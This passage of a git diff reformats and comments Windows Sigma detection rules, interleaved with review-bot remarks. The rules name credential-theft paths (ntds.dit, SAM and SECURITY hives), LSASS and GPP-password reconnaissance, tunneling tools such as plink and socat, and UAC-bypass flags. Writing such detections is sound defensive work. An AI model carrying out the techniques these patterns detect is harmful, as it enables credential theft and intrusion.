https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html 
@@ -23,12 +22,20 @@ detection: ParentCommandLine|contains|all: - /Online - /Disable-Feature - NewProcessName|endswith: \DismHost.exe + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet + NewProcessName|endswith: \DismHost.exe selection_dism: - CommandLine|contains|all: + CommandLine|contains|all: - /Online - /Disable-Feature - NewProcessName|endswith: \Dism.exe + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet + NewProcessName|endswith: \Dism.exe condition: process_creation and (1 of selection_*) falsepositives: - Legitimate script diff --git a/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml index 603ac6929..80ee0de61 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml @@ -1,10 +1,10 @@ title: Domain Trust Discovery Via Dsquery id: 3bad990e-4848-4a78-9530-b427d854aac0 related: - - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects execution of "dsquery.exe" for domain trust discovery references: @@ -24,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dsquery.exe - - OriginalFileName: dsquery.exe + - NewProcessName|endswith: \dsquery.exe + - OriginalFileName: dsquery.exe selection_cli: - CommandLine|contains: trustedDomain + CommandLine|contains: trustedDomain condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the utilities by legitimate user for legitimate reason 
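Review bot: The commented-out `# - '/FeatureName:'`, `# - '/Remove'`, `# /NoRestart` and `# /quiet` lines added inside both `contains|all` lists carry no rationale, and the last two are not even written as list entries, so a reader cannot tell whether they are optional tightening terms or leftovers. I would replace them with one comment stating the intent, e.g. `# Note: add '/FeatureName:' or '/Remove' to narrow this to feature removals; '/NoRestart' and '/quiet' are presumably too common to require`, or drop them. The name of the first selection block (the `ParentCommandLine` one) sits before the start of this hunk.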
diff --git a/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml b/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml index 67d9f5fdd..42803654e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml @@ -1,8 +1,7 @@ title: Suspicious Kernel Dump Using Dtrace id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 status: test -description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, - which is available on Windows systems since Windows 10 19H1 +description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 references: - https://twitter.com/0gtweet/status/1474899714290208777?s=12 - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_plain: - CommandLine|contains: lkd(0) - NewProcessName|endswith: \dtrace.exe + CommandLine|contains: lkd(0) + NewProcessName|endswith: \dtrace.exe selection_obfuscated: - CommandLine|contains|all: + CommandLine|contains|all: - syscall:::return - lkd( condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml index d1a4297f7..73a6de62b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml 
@@ -1,8 +1,7 @@ title: DumpMinitool Execution id: dee0a7a3-f200-4112-a99b-952196d81e42 status: experimental -description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of - process memory via the use of the "MiniDumpWriteDump" +description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" references: - https://twitter.com/mrd0x/status/1511415432888131586 - https://twitter.com/mrd0x/status/1511489821247684615 @@ -23,16 +22,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - NewProcessName|endswith: + - \DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' diff --git a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml index c18ca0e64..282f64e30 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml 
@@ -21,29 +21,28 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - NewProcessName|endswith: + - \DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe filter_folder: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio\ - - \Extensions\ + - \Extensions\ # https://github.com/microsoft/vstest/blob/b2e2126f1aa7e5753cafe9515563c99ade6a59ce/src/package/nuspec/Microsoft.TestPlatform.Portable.nuspec#L159 susp_flags: - CommandLine|contains: .txt + CommandLine|contains: .txt cmd_has_flags: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' filter_cmd_misses_flags: - CommandLine|contains: --dumpType - condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags - or ( cmd_has_flags and not filter_cmd_misses_flags ) )) + CommandLine|contains: --dumpType + condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags or ( cmd_has_flags and not filter_cmd_misses_flags ) )) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml b/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml index 0024260af..4df0744bf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml +++ b/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml 
@@ -1,9 +1,7 @@ title: Esentutl Gather Credentials id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 status: test -description: Conti recommendation to its affiliates to use esentutl to access NTDS - dumped file. Trickbot also uses this utilities to get MSEdge info via its module - pwgrab. +description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. references: - https://twitter.com/vxunderground/status/1423336151860002816 - https://attack.mitre.org/software/S0404/ @@ -23,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - esentutl - ' /p' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml b/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml index bfdf0674b..a184774ff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml @@ -1,8 +1,7 @@ title: Copying Sensitive Files with Credential Data id: e7be6119-fc37-43f0-ad4f-1f3f99be2f9f status: test -description: Files with well-known filenames (sensitive files with credential data) - copying +description: Files with well-known filenames (sensitive files with credential data) copying references: - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/ - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment 
@@ -24,19 +23,19 @@ detection: EventID: 4688 Channel: Security selection_esent_img: - - NewProcessName|endswith: \esentutl.exe - - OriginalFileName: \esentutl.exe + - NewProcessName|endswith: \esentutl.exe + - OriginalFileName: \esentutl.exe selection_esent_cli: - CommandLine|contains: + CommandLine|contains: - vss - ' /m ' - ' /y ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - \windows\ntds\ntds.dit - \config\sam - \config\security - - '\config\system ' + - '\config\system ' # space needed to avoid false positives with \config\systemprofile\ - \repair\sam - \repair\system - \repair\security @@ -45,7 +44,6 @@ detection: - \config\RegBack\security condition: process_creation and (all of selection_esent_* or selection_susp_paths) falsepositives: - - Copying sensitive files for legitimate use (eg. backup) or forensic investigation - by legitimate incident responder or forensic invetigator + - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml b/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml index 7c6c2e14f..c2bf9a816 100644 --- a/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml +++ b/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml 
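Review bot: `OriginalFileName: \esentutl.exe` in `selection_esent_img` keeps a leading backslash on a field that carries the PE version-info file name rather than a path, so that alternative can never match and the selection effectively relies on `NewProcessName|endswith` alone; the sibling esentutl webcache rule in this same patch uses `OriginalFileName: esentutl.exe`. The commit only re-indents the line and does not fix it. Change it to `- OriginalFileName: esentutl.exe`. The added comment on `'\config\system '` is a helpful why-note and should stay.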
@@ -1,8 +1,7 @@ title: Esentutl Steals Browser Information id: 6a69f62d-ce75-4b57-8dce-6351eb55b362 status: test -description: One way Qbot steals sensitive information is by extracting browser data - from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe +description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - https://redcanary.com/threat-detection-report/threats/qbot/ @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \esentutl.exe - - OriginalFileName: esentutl.exe + - NewProcessName|endswith: \esentutl.exe + - OriginalFileName: esentutl.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - /r - -r selection_webcache: - CommandLine|contains: \Windows\WebCache + CommandLine|contains: \Windows\WebCache condition: process_creation and (all of selection*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml index d8ebd7bf9..994edfade 100644 --- a/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml 
@@ -1,11 +1,10 @@ title: Potentially Suspicious Event Viewer Child Process id: be344333-921d-4c4d-8bb8-e584cf584780 related: - - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 - type: derived + - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 + type: derived status: test -description: Detects uncommon or suspicious child processes of "eventvwr.exe" which - might indicate a UAC bypass attempt +description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 @@ -27,7 +26,7 @@ detection: selection: ParentProcessName|endswith: \eventvwr.exe filter_main_generic: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\System32\mmc.exe - :\Windows\System32\WerFault.exe - :\Windows\SysWOW64\WerFault.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml b/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml index a85e38e1f..3dc23ce70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \plink.exe - \socat.exe - \stunnel.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml b/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml index 4a3ee084b..43bbd4dcf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml 
@@ -1,8 +1,7 @@ title: Potentially Suspicious Cabinet File Expansion id: 9f107a84-532c-41af-b005-8d12a607639f status: test -description: Detects the expansion or decompression of cabinet files from potentially - suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks +description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks references: - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ @@ -20,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_cmd: - CommandLine|contains: + CommandLine|contains: - '/F:' - '-F:' - NewProcessName|endswith: \expand.exe + NewProcessName|endswith: \expand.exe selection_folders_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - \Temporary Internet 
@@ -34,20 +33,20 @@ detection: - \AppData\Roaming\Temp - :\Windows\Temp selection_folders_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ filter_optional_dell: - CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\ + # Launched by Dell ServiceShell.exe + CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\ ParentProcessName: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe - condition: process_creation and (selection_cmd and 1 of selection_folders_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*) falsepositives: - System administrator Usage level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml b/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml index 61088e9c0..45a50f257 100644 --- a/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml +++ b/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml 
@@ -1,20 +1,15 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test -description: 'Detects a command line process that uses explorer.exe to launch arbitrary - commands or binaries, - - which is similar to cmd.exe /c, only it breaks the process tree and makes its - parent a new instance of explorer spawning from "svchost" - - ' +description: | + Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, + which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ -author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), - @gott_cyber +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber date: 2019/06/29 modified: 2022/09/20 tags: 
@@ -28,10 +23,13 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} - - CommandLine|contains|all: - - explorer.exe - - ' /root,' + # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference + - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - explorer.exe + - ' /root,' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml index 9adfa3d63..f1df08c48 100644 --- a/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: explorer.exe - NewProcessName|endswith: \explorer.exe + CommandLine|contains: explorer.exe + NewProcessName|endswith: \explorer.exe ParentProcessName|endswith: \cmd.exe condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml b/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml index 5ceaea196..c68682784 100644 --- a/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml +++ b/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml 
@@ -1,9 +1,7 @@ title: Explorer NOUACCHECK Flag id: 534f2ef7-e8a2-4433-816d-c91bccde289b status: test -description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag - that allows to run all sub processes of that newly started explorer.exe without - any UAC checks +description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks references: - https://twitter.com/ORCA6665/status/1496478087244095491 author: Florian Roth (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /NOUACCHECK - NewProcessName|endswith: \explorer.exe + CommandLine|contains: /NOUACCHECK + NewProcessName|endswith: \explorer.exe filter_dc_logon: - - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule - - ParentProcessName: C:\Windows\System32\svchost.exe + - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule + - ParentProcessName: C:\Windows\System32\svchost.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Domain Controller User Logon diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml index bae588904..6e697862d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_download.yml 
@@ -1,20 +1,16 @@ title: Remote File Download Via Findstr.EXE id: 587254ee-a24b-4335-b3cd-065c0f1f4baa related: - - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f - type: obsoletes + - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f + type: obsoletes status: experimental -description: 'Detects execution of "findstr" with specific flags and a remote share - path. This specific set of CLI flags would allow "findstr" to download the content - of the file located on the remote share as described in the LOLBAS entry. - - ' +description: | + Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali - (Nextron Systems) +author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/05 modified: 2023/11/12 tags: @@ -31,19 +27,19 @@ detection: EventID: 4688 Channel: Security selection_findstr: - - CommandLine|contains: findstr - - NewProcessName|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - NewProcessName|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_download_1: - CommandLine|contains: + CommandLine|contains: - ' /v ' - ' -v ' selection_cli_download_2: - CommandLine|contains: + CommandLine|contains: - ' /l ' - ' -l ' selection_cli_download_3: - CommandLine|contains: \\\\ + CommandLine|contains: \\\\ condition: process_creation and (selection_findstr and all of selection_cli_download_*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml index c9273888a..8d7ef2b59 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml @@ -1,8 +1,7 @@ title: Findstr GPP Passwords id: 91a2c315-9ee6-4052-a853-6f6a8238f90d status: test -description: Look for the encrypted cpassword value within Group Policy Preference - files on the Domain Controller. This value can be decrypted with gpp-decrypt. +description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr author: frack113 @@ -19,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - cpassword - \sysvol\ - .xml diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml index de9d292ed..328487538 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_lnk.yml 
@@ -1,8 +1,7 @@ title: Findstr Launching .lnk File id: 33339be3-148b-4e16-af56-ad16ec6c7e7b status: test -description: Detects usage of findstr to identify and execute a lnk file as seen within - the HHS redirect attack +description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack references: - https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/ author: Trent Liffick @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .lnk - .lnk" - .lnk' diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml index 8876d453c..79ebab53c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_lsass.yml @@ -1,8 +1,7 @@ title: LSASS Process Reconnaissance Via Findstr.EXE id: fe63010f-8823-4864-a96b-a7b4a0f7b929 status: experimental -description: Detects findstring commands that include the keyword lsass, which indicates - recon actviity for the LSASS process PID +description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 author: Florian Roth (Nextron Systems) 
@@ -19,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection_findstr_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_findstr_cli: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special: - CommandLine|contains: + CommandLine|contains: - ' /i "lsass' - ' /i lsass.exe' - findstr "lsass diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml index 704424551..6c995ef2e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml @@ -1,9 +1,7 @@ title: Permission Misconfiguration Reconnaissance Via Findstr.EXE id: 47e4bab7-c626-47dc-967b-255608c9a920 status: experimental -description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This - is seen being used in combination with "icacls" to look for misconfigured files - or folders permissions +description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -20,20 +18,24 @@ detection: EventID: 4688 Channel: Security selection_findstr_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_findstr_cli: - CommandLine|contains: + CommandLine|contains: - '"Everyone"' - - '''Everyone''' + - "'Everyone'" - '"BUILTIN\\"' - - '''BUILTIN\''' + - "'BUILTIN\\'" selection_special: - CommandLine|contains|all: + CommandLine|contains|all: + # Example CLI would be: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" + # You could extend it for other groups and users + # Example: icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" + # Note: This selection only detects the command when executed from a handler such as a "cmd /c" or "powershell -c" - 'icacls ' - 'findstr ' - Everyone diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml index 03ca3b8c6..b56f62f8a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml 
@@ -1,15 +1,11 @@ title: Recon Command Output Piped To Findstr.EXE id: ccb5742c-c248-4982-8c5c-5571b9275ad3 related: - - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 - type: derived + - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 + type: derived status: experimental -description: 'Detects the excution of a potential recon command where the results - are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" - via the "/c" or "/k" for example. Attackers often time use this to extract specific - information they require in their chain. - - ' +description: | + Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain. references: - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf @@ -28,7 +24,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Note: Add additional CLI to increase and enhance coverage - 'ipconfig /all | find ' - 'ipconfig /all | findstr ' - 'ipconfig | find ' diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml index 8aea37d00..b14d5f453 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml 
@@ -1,16 +1,12 @@ title: Security Tools Keyword Lookup Via Findstr.EXE id: 4fe074b4-b833-4081-8f24-7dcfeca72b42 related: - - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 - type: derived + - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 + type: derived status: experimental -description: 'Detects execution of "findstr" to search for common names of security - tools. Attackers often pipe the results of recon commands such as "tasklist" or - "whoami" to "findstr" in order to filter out the results. - +description: | + Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ @@ -29,14 +25,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - 